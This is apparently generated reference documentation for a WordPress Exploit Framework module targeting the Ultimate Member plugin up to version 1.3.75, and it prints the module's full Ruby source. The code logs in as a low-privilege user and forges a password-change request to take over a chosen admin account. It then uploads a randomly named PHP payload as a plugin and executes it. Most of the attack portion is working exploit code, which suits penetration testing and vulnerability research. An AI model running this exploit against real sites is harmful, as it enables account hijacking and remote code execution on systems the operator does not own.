Class: Wpxf::Exploit::UltimateMemberShellUpload

Inherits:
Module
  • Object
show all
Includes:
Wpxf, Net::HttpClient, WordPress::Login, WordPress::Plugin
Defined in:
lib/wpxf/modules/exploit/shell/ultimate_member_shell_upload.rb

Constant Summary

Constants included from Net::HttpOptions

Net::HttpOptions::HTTP_OPTION_BASIC_AUTH_CREDS, Net::HttpOptions::HTTP_OPTION_CLIENT_TIMEOUT, Net::HttpOptions::HTTP_OPTION_FOLLOW_REDIRECT, Net::HttpOptions::HTTP_OPTION_HOST, Net::HttpOptions::HTTP_OPTION_HOST_VERIFICATION, Net::HttpOptions::HTTP_OPTION_MAX_CONCURRENCY, Net::HttpOptions::HTTP_OPTION_PEER_VERIFICATION, Net::HttpOptions::HTTP_OPTION_PORT, Net::HttpOptions::HTTP_OPTION_PROXY, Net::HttpOptions::HTTP_OPTION_PROXY_AUTH_CREDS, Net::HttpOptions::HTTP_OPTION_SSL, Net::HttpOptions::HTTP_OPTION_TARGET_URI, Net::HttpOptions::HTTP_OPTION_USER_AGENT, Net::HttpOptions::HTTP_OPTION_VHOST

Constants included from WordPress::Options

WordPress::Options::WP_OPTION_CONTENT_DIR

Instance Attribute Summary

Attributes inherited from Module

#active_workspace, #event_emitter, #payload, #session_cookie

Attributes included from Options

#datastore, #options

Instance Method Summary collapse

Methods included from WordPress::Plugin

#fetch_plugin_upload_nonce, #generate_wordpress_plugin_header, #upload_payload_as_plugin, #upload_payload_as_plugin_and_execute

Methods included from WordPress::Login

#valid_wordpress_cookie?, #wordpress_login, #wordpress_login_post_body

Methods included from Net::HttpClient

#base_http_headers, #base_uri, #download_file, #execute_delete_request, #execute_get_request, #execute_post_request, #execute_put_request, #execute_queued_requests, #execute_request, #full_uri, #initialize_advanced_options, #initialize_options, #max_http_concurrency, #normalize_relative_uri, #normalize_uri, #queue_request, #target_host, #target_port, #target_uri

Methods included from Net::TyphoeusHelper

#advanced_typhoeus_options, #create_typhoeus_request, #create_typhoeus_request_options, #standard_typhoeus_options

Methods included from Net::UserAgent

#clients_by_frequency, #random_browser_and_os, #random_chrome_platform_string, #random_firefox_platform_string, #random_firefox_version_string, #random_iexplorer_platform_string, #random_opera_platform_string, #random_processor_string, #random_safari_platform_string, #random_time_string, #random_user_agent

Methods included from Versioning::OSVersions

#random_nt_version, #random_osx_version

Methods included from Versioning::BrowserVersions

#random_chrome_build_number, #random_chrome_version, #random_ie_version, #random_opera_version, #random_presto_version, #random_presto_version2, #random_safari_build_number, #random_safari_version, #random_trident_version

Methods included from Wpxf

app_path, build_module_list, change_stdout_sync, custom_modules_path, data_directory, databases_path, gemspec, home_directory, load_custom_modules, load_module, modules_path, payloads_path, version

Methods inherited from Module

#aux_module?, #can_execute?, #check_wordpress_and_online, #cleanup, #exploit_module?, #missing_options, #set_option_value, #unset_option

Methods included from Db::Credentials

#store_credentials

Methods included from ModuleAuthentication

#authenticate_with_wordpress

Methods included from WordPress::Urls

#wordpress_url_admin, #wordpress_url_admin_ajax, #wordpress_url_admin_options, #wordpress_url_admin_post, #wordpress_url_admin_profile, #wordpress_url_admin_update, #wordpress_url_atom, #wordpress_url_author, #wordpress_url_comments_post, #wordpress_url_login, #wordpress_url_new_user, #wordpress_url_opml, #wordpress_url_plugin_install, #wordpress_url_plugin_upload, #wordpress_url_plugins, #wordpress_url_post, #wordpress_url_rdf, #wordpress_url_readme, #wordpress_url_rest_api, #wordpress_url_rss, #wordpress_url_sitemap, #wordpress_url_themes, #wordpress_url_uploads, #wordpress_url_wp_content, #wordpress_url_xmlrpc

Methods included from WordPress::Options

#wp_content_dir

Methods included from WordPress::Fingerprint

#check_plugin_version_from_changelog, #check_plugin_version_from_readme, #check_theme_version_from_readme, #check_theme_version_from_style, #check_version_from_custom_file, #wordpress_and_online?, #wordpress_version

Methods included from Options

#all_options_valid?, #get_option, #get_option_value, #missing_options, #normalized_option_value, #option_valid?, #option_value?, #register_advanced_options, #register_evasion_options, #register_option, #register_options, #scoped_option_change, #set_option_value, #unregister_option, #unset_option

Methods included from OutputEmitters

#emit_error, #emit_info, #emit_success, #emit_table, #emit_warning

Methods included from ModuleInfo

#emit_usage_info, #module_author, #module_date, #module_desc, #module_description_preformatted, #module_name, #module_references, #update_info

Constructor Details

#initializeUltimateMemberShellUpload

Returns a new instance of UltimateMemberShellUpload.



9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
 
# File 'lib/wpxf/modules/exploit/shell/ultimate_member_shell_upload.rb', line 9

def initialize
  super

  update_info(
    name: 'Ultimate Member <= 1.3.75 Shell Upload',
    desc: 'This module exploits a vulnerability that allows users of any level to change '\
          'the password of any user. The module requires you login with an account of any '\
          'level, which will then be used to change the specified admin users\' password. '\
          'The compromised admin account will then be used to store and execute the payload.',
    author: [
      'James Golovich', # Discovery and disclosure
      'rastating'       # WPXF module
    ],
    references: [
      ['WPVDB', '8688'],
      ['URL', 'https://ultimatemember.com/security-release-v1-3-76/']
    ],
    date: 'Dec 08 2016'
  )

  register_options([
    StringOption.new(
      name: 'password_form_path',
      desc: 'The path of the change password form (default is /account/password/)',
      required: true
    ),
    IntegerOption.new(
      name: 'admin_user_id',
      desc: 'The ID of the user to hijack the account of',
      required: true
    ),
    StringOption.new(
      name: 'admin_username',
      desc: 'The username of the admin user to hijack the account of',
      required: true
    )
  ])
end

Instance Method Details

#admin_user_idObject 



60
61
62
 
# File 'lib/wpxf/modules/exploit/shell/ultimate_member_shell_upload.rb', line 60

def admin_user_id
  normalized_option_value('admin_user_id')
end

#admin_usernameObject 



64
65
66
 
# File 'lib/wpxf/modules/exploit/shell/ultimate_member_shell_upload.rb', line 64

def admin_username
  normalized_option_value('admin_username')
end

#before_uploadObject 



90
91
92
93
94
95
96
97
98
99
100
101
102
103
 
# File 'lib/wpxf/modules/exploit/shell/ultimate_member_shell_upload.rb', line 90

def before_upload
  emit_info "Changing password for #{admin_username} to #{new_password}"
  res = execute_password_change

  unless res.code == 302
    emit_error "Password change returned status #{res.code}", true
    emit_error "Failed to change the password for #{admin_username}"
    return false
  end

  @admin_cookie = authenticate_with_wordpress(admin_username, @new_password)
  return true if @admin_cookie
  false
end

#checkObject 



48
49
50
 
# File 'lib/wpxf/modules/exploit/shell/ultimate_member_shell_upload.rb', line 48

def check
  check_plugin_version_from_readme('ultimate-member', '1.3.76')
end

#execute_password_changeObject 



76
77
78
79
80
81
82
83
84
85
86
87
88
 
# File 'lib/wpxf/modules/exploit/shell/ultimate_member_shell_upload.rb', line 76

def execute_password_change
  execute_post_request(
    url: password_form_url,
    cookie: session_cookie,
    body: {
      '_um_password_change' => '1',
      'timestamp' => Utility::Text.rand_numeric(3),
      'user_password' => new_password,
      'confirm_user_password' => new_password,
      'user_id' => admin_user_id
    }
  )
end

#execute_payloadObject 



115
116
117
118
 
# File 'lib/wpxf/modules/exploit/shell/ultimate_member_shell_upload.rb', line 115

def execute_payload
  res = execute_get_request(url: @payload_url)
  emit_success "Result: #{res.body}" if res && res.code == 200 && !res.body.strip.empty?
end

#new_passwordObject 



68
69
70
71
72
73
74
 
# File 'lib/wpxf/modules/exploit/shell/ultimate_member_shell_upload.rb', line 68

def new_password
  @new_password || @new_password = Utility::Text.rand_alphanumeric(3) +
                                   Utility::Text.rand_alpha(1, :lower) +
                                   Utility::Text.rand_numeric(2) +
                                   Utility::Text.rand_alpha(1, :upper) +
                                   Utility::Text.rand_alphanumeric(3)
end

#password_form_urlObject 



56
57
58
 
# File 'lib/wpxf/modules/exploit/shell/ultimate_member_shell_upload.rb', line 56

def password_form_url
  normalize_uri(full_uri, datastore['password_form_path'])
end

#requires_authenticationObject 



52
53
54
 
# File 'lib/wpxf/modules/exploit/shell/ultimate_member_shell_upload.rb', line 52

def requires_authentication
  true
end

#runObject 



120
121
122
123
124
125
126
127
128
129
130
131
 
# File 'lib/wpxf/modules/exploit/shell/ultimate_member_shell_upload.rb', line 120

def run
  return false unless super
  return false unless before_upload

  emit_info 'Uploading payload...'
  upload_payload

  emit_info "Executing the payload at #{@payload_url}..."
  execute_payload

  true
end

#upload_payloadObject 



105
106
107
108
109
110
111
112
113
 
# File 'lib/wpxf/modules/exploit/shell/ultimate_member_shell_upload.rb', line 105

def upload_payload
  plugin_name = Utility::Text.rand_alpha(10)
  payload_name = Utility::Text.rand_alpha(10)
  @payload_url = normalize_uri(wordpress_url_plugins, plugin_name, "#{payload_name}.php")
  return true if upload_payload_as_plugin(plugin_name, payload_name, @admin_cookie)

  emit_error 'Failed to upload the payload'
  false
end